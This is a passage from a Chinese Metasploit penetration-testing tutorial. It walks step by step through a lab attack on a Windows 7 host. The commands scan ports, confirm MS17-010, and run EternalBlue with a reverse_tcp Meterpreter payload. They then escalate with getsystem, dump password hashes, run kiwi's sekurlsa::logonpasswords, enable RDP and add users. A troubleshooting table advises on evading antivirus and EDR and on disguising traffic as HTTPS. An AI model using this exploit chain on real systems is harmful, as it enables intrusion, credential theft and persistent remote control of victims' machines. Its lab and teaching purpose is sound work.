实战流程串联与避坑指南现在我们把前面所有步骤串联起来形成一个完整的、可复现的基础渗透测试流程。同时我会分享一些最容易让新手“翻车”的坑点及其解决方案。6.1 一次完整的攻击链演示假设目标是一台IP为192.168.2.150的未知主机。步骤一信息收集msf6 use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) set RHOSTS 192.168.2.150 msf6 auxiliary(scanner/portscan/tcp) set PORTS 1-1000 msf6 auxiliary(scanner/portscan/tcp) run [*] 发现开放端口22/tcp (ssh), 80/tcp (http), 445/tcp (smb)发现445端口深入侦察SMB。msf6 use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) set RHOSTS 192.168.2.150 msf6 auxiliary(scanner/smb/smb_version) run [*] 192.168.2.150:445 - Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)确认是一台未打补丁的Windows 7。步骤二漏洞验证与利用msf6 use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) set RHOSTS 192.168.2.150 msf6 auxiliary(scanner/smb/smb_ms17_010) run [] 192.168.2.150:445 - Host is likely VULNERABLE to MS17-010!扫描确认漏洞存在。发起攻击。msf6 use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) set RHOSTS 192.168.2.150 msf6 exploit(windows/smb/ms17_010_eternalblue) set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) set LHOST 192.168.2.1 # 攻击机IP msf6 exploit(windows/smb/ms17_010_eternalblue) set LPORT 4444 msf6 exploit(windows/smb/ms17_010_eternalblue) exploit [*] Sending stage ... Meterpreter session 1 opened. meterpreter 步骤三后渗透操作meterpreter sysinfo meterpreter getuid # 如果是普通用户 meterpreter getsystem # 尝试提权 meterpreter getuid # 确认提权成功 meterpreter hashdump # 抓取哈希 meterpreter run post/windows/manage/enable_rdp # 尝试开启远程桌面 meterpreter shell # 进入命令行添加用户等6.2 常见问题排查与避坑技巧实录在实际操作中你会遇到各种各样的问题。下面这个表格整理了我遇到最多的几种情况及其解决思路问题现象可能原因排查与解决思路exploit执行后无反应或很快失败1. 目标不存在该漏洞已打补丁。2. 网络不通或防火墙拦截。3. Payload不兼容如x86/x64混淆。1. 用check命令或辅助扫描器再确认。2. 用ping或auxiliary/scanner/portscan/tcp确认目标端口可达。3. 尝试更换Payload如windows/meterpreter/reverse_tcp和windows/x64/meterpreter/reverse_tcp互换。[*] Started reverse TCP handler...但一直不反弹会话1.LHOST设置错误如用了127.0.0.1。2. 目标出站防火墙阻止了连接到LPORT。3. Payload在目标执行失败被杀软拦截。1. 确保LHOST是攻击机能被目标访问到的IP在NAT/虚拟机中尤其注意。2. 尝试更换LPORT为80、443、53等常见出站允许端口。3. 尝试使用bind_tcp正向连接Payload或编码/加密的Payload如windows/x64/meterpreter/reverse_tcp的编码变体。Meterpreter会话建立后立即断开1. Payload不稳定或与系统冲突。2. 目标网络中断。3. 被终端安全软件AV/EDR杀死。1. 尝试使用reverse_https或reverse_winhttp等更稳定的Payload它们伪装成正常HTTPS流量。2. 使用set AutoRunScript migrate -f在攻击前设置自动迁移进程到稳定进程如explorer.exe。3. 考虑使用免杀技术或更轻量的Payload如shell_reverse_tcp。hashdump命令失败返回“未定义方法”权限不足或系统版本过高LSASS保护。1. 先getsystem提权。2. 加载kiwi模块load kiwi然后使用kiwi_cmd sekurlsa::logonpasswords。3. 使用post/windows/gather/hashdump后渗透模块。无法上传/下载文件1. 目录没有写权限。2. 磁盘空间不足。3. 被实时文件监控拦截。1. 尝试切换到C:\\Windows\\Temp等通常有写权限的目录。2. 检查磁盘空间shell进入后执行dir或wmic logicaldisk get size,freespace,caption。3. 尝试对文件进行编码或分片传输。几个关键的避坑技巧LHOST是万恶之源超过一半的连接问题都出在LHOST设置错误。在虚拟机环境中如果攻击机是KaliNAT模式目标靶机是同一宿主机的另一台虚拟机桥接模式那么Kali的LHOST不能设ifconfig看到的IP那是虚拟内网IP而应该设宿主机的物理IP或者使用0.0.0.0监听所有接口再配合端口转发。最稳妥的方法是在攻击机上用ip addr或ifconfig查看IP然后用靶机ping一下这个IP确保能通。Payload的稳定性优先对于初期学习reverse_tcp最简单。但在真实环境或较新靶机中优先使用reverse_https。它使用SSL/TLS加密通信更隐蔽且能更好地穿透防火墙和代理。善用search和infoMSF有上千个模块不要死记硬背。search命令支持按名称、类型、平台搜索。search type:exploit platform:windows smb。选中模块后info命令会显示详细的描述、作者、参考链接CVE、兼容性、选项说明等这是最好的学习资料。会话管理在MSF中用sessions -l列出所有活跃会话用sessions -i ID切换回某个会话。用background将当前Meterpreter会话放到后台会话保持而不是exit退出并关闭会话。多会话操作是内网渗透的基础。这套从Auxiliary侦察到Exploit突破再到Meterpreter后渗透的流程构成了Metasploit最基础也是最核心的使用逻辑。真正的熟练来自于在像DC-1、VulnHub这类靶场中的反复练习。每一次失败后的排查都会让你对网络、系统、协议和工具本身有更深的理解。记住工具是死的思路是活的。Metasploit给了你强大的武器库但如何组合运用这些武器制定攻击策略才是渗透测试艺术的开始。
